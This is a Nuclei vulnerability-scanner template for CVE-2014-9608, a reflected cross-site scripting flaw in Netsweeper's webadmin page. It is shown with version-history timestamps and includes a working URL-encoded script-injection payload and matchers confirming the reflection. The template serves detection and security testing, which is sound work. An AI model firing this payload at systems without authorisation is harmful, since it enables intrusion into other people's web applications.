nuclei-templates/http/cves/2014/CVE-2014-9608.yaml

59 lines
2.2 KiB
YAML
Raw Normal View History

2021-12-06 16:38:54 +00:00
id: CVE-2014-9608
info:
name: Netsweeper 4.0.3 - Cross-Site Scripting
2021-12-06 16:38:54 +00:00
author: daffainfo
severity: medium
2023-07-27 18:06:32 +00:00
description: |
A cross-site scripting vulnerability in webadmin/policy/group_table_ajax.php/ in Netsweeper before 3.1.10, 4.0.x before 4.0.9, and 4.1.x before 4.1.2 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the targeted user's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
2023-09-06 13:22:34 +00:00
remediation: |
Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
2021-12-07 07:25:09 +00:00
reference:
- https://packetstormsecurity.com/files/download/133034/netsweeper-issues.tgz
2021-12-07 07:35:50 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2014-9608
- http://packetstormsecurity.com/files/133034/Netsweeper-Bypass-XSS-Redirection-SQL-Injection-Execution.html
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2014-9608
cwe-id: CWE-79
epss-score: 0.00102
2024-05-31 19:23:20 +00:00
epss-percentile: 0.41716
2023-09-06 13:22:34 +00:00
cpe: cpe:2.3:a:netsweeper:netsweeper:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: netsweeper
product: netsweeper
2024-01-14 09:21:50 +00:00
tags: cve2014,cve,netsweeper,xss,packetstorm
2021-12-06 16:38:54 +00:00
http:
2021-12-06 16:38:54 +00:00
- method: GET
path:
2021-12-07 07:25:09 +00:00
- '{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
2021-12-06 16:38:54 +00:00
matchers-condition: and
matchers:
- type: word
part: body
2021-12-07 07:25:09 +00:00
words:
- '</script><script>alert(document.domain)</script>'
2021-12-06 16:38:54 +00:00
2023-07-27 18:06:32 +00:00
- type: word
part: header
words:
- 'webadminU='
- 'webadmin='
condition: or
2021-12-06 16:38:54 +00:00
- type: word
part: header
words:
- text/html
- type: status
status:
2023-08-31 11:46:18 +00:00
- 200
# digest: 490a0046304402203ce0d1e40367b31eefec71137f6bf16ab3b345be2f2b7a7797a9784aa65eb723022014b4a8a7ae8933afffede51f1d4fd8208e04a33bebae97310111ca8fbbf01ab8:922c64590222798bb761d5b6d8e72950